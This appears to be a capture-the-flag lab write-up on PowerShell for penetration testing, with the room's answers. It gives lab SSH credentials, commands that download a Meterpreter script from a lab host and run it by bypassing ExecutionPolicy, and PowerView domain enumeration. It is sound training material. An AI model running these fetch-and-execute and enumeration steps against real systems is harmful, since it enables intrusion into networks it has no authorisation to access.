Powershell for Pentesters
This room covers the principle uses of PowerShell in Penetration Tests. Interacting with files, scanning the network and system enumeration are covered.
Last updated
This room covers the principle uses of PowerShell in Penetration Tests. Interacting with files, scanning the network and system enumeration are covered.
Last updated
This room can be found here. This section will cover the basics of PowerShell that will be useful in any engagement.
Target machine SSH credentials:
Username: walter
Password: Kowacs123!
We can then run powershell to access PowerShell.
Most of the command-line portions of pentest training focus on using Linux, but most corporate systems are Windows. So it is important that the Red Team member feels at home in both operating systems.
There are several PowerShell scripts useful in penetration tests, such as PowerView and Nishang, the downside to these and other scripts are they are detected by most AV (antivirus) software.
powerview.ps1 - dir on Walters desktop to see the files
Start-Process - Used to start a process, such as notepad.
Get-Process - Lists all running processes. Can also be used with the -name parameter to filter for a specific process
(command) | Export-Csv - Exports the Previously piped command into a .CSV file that may be easier to read.
Get-Content - Shows the contents of a file. Similar to the cat command on linux.
Copy-Item - Copies and item
Move-Item - Moves and item
Get-FileHash - Obtains file hash of specified file
501570FFBA7FACE69D61DA1A0843E89A - Get-FileHash -Algorithm MD5 .\Desktop\powerview.ps1 will give us the
There are multiple ways to download files from a server using PowerShell. One of the quickest ways is using WebClient and DownloadFile.
(New-Object System.Net.WebClient)DownloadFile('URL/File', 'Output-File')
Example: (New-Object System.Net.WebClient)DownloadFile('http://10.0.2.8/meterpreter-64.ps1', 'meterpreter.ps1')
This will connect to the host 10.0.2.8 and download themeterpreter-64.ps1 file. The file is then saved as βmeterpreter.ps1β
Another method is by using Invoke-WebRequest
Invoke-WebRequest "URL/File" -OutFile "File"
Invoke-WebRequest "http://10.0.2.8/meterpreter-64.ps1" -Outfile "meterpreter.ps1"
Once we have the file downloaded, we can run the file, but we may run into an ExecutionPolicy issue. Microsoft has stated ExecutionPolicy is NOT a security feature. but it functions as an added safety measure and can be bypassed by the user.
The current state of the ExecutionPolicy configuration can be seen using βGet-ExecutionPolicy -listβ
Execution policies can have seven different values:
AllSigned - Scripts can run but require all scripts to be signed by a trusted publisher.
Bypass - All scripts can run, and no warnings or prompts will be displayed.
Default - This refers to βrestrictedβ for Windows clients and βRemoteSignedβ for Windows servers.
RemoteSigned - Scripts can run, and this does not require local scripts to be digitally signed.
Restricted - The default configuration for Windows clients. Allows individual commands to run, does not allow scripts.
Undefined - This shows that no specific execution policy was set. This means default execution policies will be enforced.
Unrestricted - Most scripts will run.
We several alternatives to bypass the ExecutionPolicy, but some methods require the user to have administrator account privileges. The most common way is:
powershell -ExecutionPolicy Bypass -File .\(File)
Example: powershell -ExecutionPolicy Bypass -File .\meterpreter.ps1
powershell -Exec Bypass -File .\(File)
Example: powershell -Exec Bypass -File .\meterpreter.ps1
We can also change the ExecutionPolicy for processes using Set-ExecutionPolicy Bypass -Scope Process then attempt to run the file.
Get-Hotfix - Enumerate already installed patches
Get-Hotfix | Format-list | findstr InstalledOn
Get-Hotfix | Format-Table HotFixID
Format-List - Used to gather more information about objects
dir | Format-List
Out-File - Used to save the output to a file for further use
Get-Hotfix | Out-File Hotfixes.txt
KB4499728 - Get-HotFix can give us our answer
PowerView is one of the most effective ways to gather information on the domain. The module can be downloaded from here.
Once we download the file, we will need to bypass the execution policy, then import the module.
powershell -Exec Bypass .\powerview.ps1
Import-Module .\powerview.ps1
With powerview imported we can use it to obtain information on Domain Configuration and users.
Get-NetDomainController - Collect information on the domain controller
Get-NetUser - Provide a list of domain users. Depending on the size of the company, we may want to output this to a .csv
Get-NetUser | select -ExpandProperty lastlogon can be used to expand on this command to view the users last logon date/time
Get-NetComputer - Enumerate systems connected to the domain
Get-NetGroup - Enumerate Existing Groups
Get-NetGroupMemer "Domain Admins" can be used to find group members in the "Domain Admins" group.
Find-DomainShare - Lists available shares
Get-NetGPO - Gather information on enforced policies through Group Policy.
Find-LocalAdminAccess - List systems in the domain you may access as a local administrator
IDF-17828290 - Get-NetUser -properties distinguishedname,cn,sn,description,useraccountcontrol can give us details. We can ofcourse add additional properties if we find fit.
4 - Seeing previous screenshot/command we can find our answer.
3 - Get-NetGroupMember "Domain Admins" can give us our answer
usand, ssilk, ServerAdmin - Previous command and screenshot give us our answer.
operationfiles - Find-DomainShare -CheckShareAccess, most of these look pretty normal except this one.
Disable WinDef - Running Get-NetGPO -properties displayname we see the list of Group Policy display names
Daniel, Ursula -Looking at our previous command, Get-NetUser -properties distinguishedname,cn,sn,description,useraccountcontrol, we can see the first and last name of the users and can see which one are disabled.
